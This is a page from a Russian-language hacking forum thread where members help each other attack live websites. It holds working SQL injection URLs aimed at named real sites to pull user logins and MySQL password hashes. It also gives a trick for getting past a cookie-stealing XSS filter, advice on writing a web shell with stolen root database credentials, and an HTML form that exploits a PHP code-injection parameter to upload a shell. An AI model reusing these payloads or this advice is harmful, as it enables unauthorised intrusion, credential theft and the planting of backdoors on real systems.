Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. Melfis

    Melfis Elder - Старейшина

    Joined:
    25 Apr 2011
    Messages:
    505
    Likes Received:
    105
    Reputations:
    53
    Как так, стоит фильтрация на слова script /script?

    бывает, что стоит фильтрация на "document.cookie". Тогда просто сделай d = document; и вставляй d.cookie;

    В общем попробуй обойти фильтрацию.
     
    #17221 Melfis, 1 Jul 2011
    Last edited: 1 Jul 2011
  2. Expl0ited

    Expl0ited Members of Antichat

    Joined:
    16 Jul 2010
    Messages:
    1,035
    Likes Received:
    534
    Reputations:
    935
    killerben, тег iframe подгружает страницу с удаленного сервера, и если ты подгрузишь там код, то это ничего не даст, он выполнится на удаленном сервере, а не на атакуемом, я тебе дал ссылку, внимательно почитай что там написано, и какие методы могут быть, вопросы отпадут сами собой!
     
    _________________________
  3. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,413
    Likes Received:
    910
    Reputations:
    863
    есть сервачек с провами роот, через уязвимость скрипта не получается залить шелл так как фельтруются ковычки, вытянул логин и пасс от бд, прова роот, через пхпмиадмин не хочет с этими даными заходить, хотя удаленно по этим же данным подключается, знаю апсолютные пути к сайту и папкам с возможностью заливкой файла, на запрос select 'blabla' into outfile '/blabla/bla.php' ругается, в чем таробла, что делаю не так?!
     
    _________________________
  4. Expl0ited

    Expl0ited Members of Antichat

    Joined:
    16 Jul 2010
    Messages:
    1,035
    Likes Received:
    534
    Reputations:
    935
    Может быть два варианта:
    - не хватает прав.
    - база данных размещается на другом сервере.
     
    _________________________
  5. qaz

    qaz Elder - Старейшина

    Joined:
    12 Jul 2010
    Messages:
    1,551
    Likes Received:
    173
    Reputations:
    75
    такой вопрос
    есть таблица узерс

    http://www.sportbars.ru/view_transl.php?id=820+UnIon+selECt+1,2,table_name,4,5,6,7,8,9,10,11,12,13,14,15+from+information_schema.tables+limit+31,1--+

    хочувывести от туда хотябы логины
    http://www.sportbars.ru/view_transl.php?id=820+UnIon+selECt+1,2,column_name,4,5,6,7,8,9,10,11,12,13,14,15+from+information_schema.columns+where+table_name=0x7573657273+limit+12,1--+

    ничего не выводит
    http://www.sportbars.ru/view_transl.php?id=820+UnIon+selECt+1,2,ulogin,4,5,6,7,8,9,10,11,12,13,14,15+from+users--+

    почему?
     
  6. Seravin

    Seravin Active Member

    Joined:
    25 Nov 2009
    Messages:
    475
    Likes Received:
    190
    Reputations:
    221
    http://www.sportbars.ru/view_transl.php?id=820+UnIon+selECt+1,2,ulogin,4,5%20,6,7,8,9,10,11,12,13,14,15+from+lol.users+limit+0,1--+
     
    1 person likes this.
  7. qaz

    qaz Elder - Старейшина

    Joined:
    12 Jul 2010
    Messages:
    1,551
    Likes Received:
    173
    Reputations:
    75
    ухты, спасибо, а можно поинтерисоватся, а lol.users
    интерисует вот ето lol. можете обяснить што ето откуда почиму и как?
     
  8. Фараон

    Фараон коКотэ Of Antichat

    Joined:
    7 Nov 2010
    Messages:
    153
    Likes Received:
    105
    Reputations:
    83
    Это база в которой находится данная таблица.
    Узнается так
    union select table_schema from information_schema.tables where table_name='users'
     
  9. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,413
    Likes Received:
    910
    Reputations:
    863
    прав хвотает, и сами сайты с БД на одном сервере, это подтверждает то что есть возможность с БД заливать файлы в папку /tmp/ и и прсоматривать то что залито через load_file()
     
    _________________________
  10. Expl0ited

    Expl0ited Members of Antichat

    Joined:
    16 Jul 2010
    Messages:
    1,035
    Likes Received:
    534
    Reputations:
    935
    А разве папки /tmp/ не должно быть на сервере где стоит БД?
    И даже если так, сервер у них один, то ничего не меняется, прав может не быть на создание файла в директориях видные из веб, а то что в tmp пишется это понятно, т.к. права к этой папке у всех пользователей системы.
     
    _________________________
  11. IMMORTAL_S

    IMMORTAL_S Member

    Joined:
    29 Apr 2010
    Messages:
    129
    Likes Received:
    9
    Reputations:
    2
    ?id=181'+or+(select+count(*)+from+information_schema.tables+group+by+concat_ws(0x3a,(select+concat_ws(':',table_schema,table_name)+from+information_schema.tables+limit+0,1),floor(rand(0)*2)))--+
    выдает- Subquery returns more than 1 row
    Где я намудрил?
     
  12. Expl0ited

    Expl0ited Members of Antichat

    Joined:
    16 Jul 2010
    Messages:
    1,035
    Likes Received:
    534
    Reputations:
    935
    видимо запрос select+concat_ws(':',table_schema,table_name)+from+information_schema.tables+limit+0,1 возвращает большой результат, попробуй просто select table_schema from information_schema.tables limit 0,1
    и отталкивайся от этого, сначала найди нужную базу, потом таблицу, потом поля, потом выводи.
     
    _________________________
    1 person likes this.
  13. IMMORTAL_S

    IMMORTAL_S Member

    Joined:
    29 Apr 2010
    Messages:
    129
    Likes Received:
    9
    Reputations:
    2
    Судя по всему да..
    ?url=181'+or+(select+count(*)+from+information_schema.tables+group+by+concat_ws(0x3a,(select+concat_ws(0x3a,user,password)+from+mysql.user+limit+0,1),floor(rand(0)*2)))--+
    Выдал - Data too long for column '(null)' at row 15
    Подскажите, почему так происходит?
     
  14. Melfis

    Melfis Elder - Старейшина

    Joined:
    25 Apr 2011
    Messages:
    505
    Likes Received:
    105
    Reputations:
    53
    где-то ты действительно намудрил

    Code:
    and(select 1 from(select count(*),concat(version(),floor(rand(0)*2))x 
    from information_schema.tables group by x)a)-- 
    вместо version() подставляешь уже
    (select table_name from information_schema.tables limit 0,1)

    У меня твоя ошибка возникала, когда не в то место подставлял данные на вывод в ошибке, и там уже не помогал никакой лимит

    Видимо попутно идёт интсерт в какую-то таблицу со статистикой, а как раз получается он большой... хотя это лишь догадка
     
    #17234 Melfis, 2 Jul 2011
    Last edited: 2 Jul 2011
    1 person likes this.
  15. MTV

    MTV New Member

    Joined:
    16 Feb 2011
    Messages:
    180
    Likes Received:
    2
    Reputations:
    0
    http://catalog.akadia.ru/totalcatalog/?st=30&l=YnJhbmRfaWQ9PTEyMTh8fG1vZGVsX2lkPT00Mjgw.Как определить кол-во полей?
     
  16. попугай

    попугай Elder - Старейшина

    Joined:
    15 Jan 2008
    Messages:
    1,520
    Likes Received:
    401
    Reputations:
    196
    http://catalog.akadia.ru/totalcatalog/?st=30&l=YnJhbmRfaWQ9PTEyMTh8fG1vZGVsX2lkPT0tNDI4MCB1bmlvbiBzZWxlY3QgdmVyc2lvbigpLS0=

    1 поле в model_id
     
    2 people like this.
  17. YuNi|[c

    YuNi|[c Elder - Старейшина

    Joined:
    17 Sep 2006
    Messages:
    293
    Likes Received:
    33
    Reputations:
    18
    возможно ли сделать поиск по базе mysql5 если не знать имени таблицы и колнки. Например в значении колонки слово maxim по текушей базе, если возможно то примерный запрос какой будеть
    спс
     
  18. Melfis

    Melfis Elder - Старейшина

    Joined:
    25 Apr 2011
    Messages:
    505
    Likes Received:
    105
    Reputations:
    53
    Нельзя. Если я конечно правильно понял про что ты.
     
  19. z0mbie86

    z0mbie86 Active Member

    Joined:
    25 Jul 2009
    Messages:
    38
    Likes Received:
    126
    Reputations:
    0
    Имеется код:
    Обращаюсь я к нему вот так http://site.ru/index.php?testKey=123&code=phpinfo();

    Нужен эксплоит который в code POST-методом будет пересылать код шелла.
     
  20. Cybersteger

    Cybersteger Member

    Joined:
    9 Oct 2009
    Messages:
    40
    Likes Received:
    13
    Reputations:
    15
    если я правильно понял

    Code:
    <form action="http://site.ru/index.php?testKey=123&code=copy($_FILES[file][tmp_name],$_GET[bob]);&bob=/home/httpdocs/files/22.php" method="post" enctype="multipart/form-data">
    <input type="file" name="file">
    <input type="submit" value="upload">
    </form>
    </form>
    где /home/httpdocs/files/ - путь к папке которая доступна на запись
     
Thread Status:
Not open for further replies.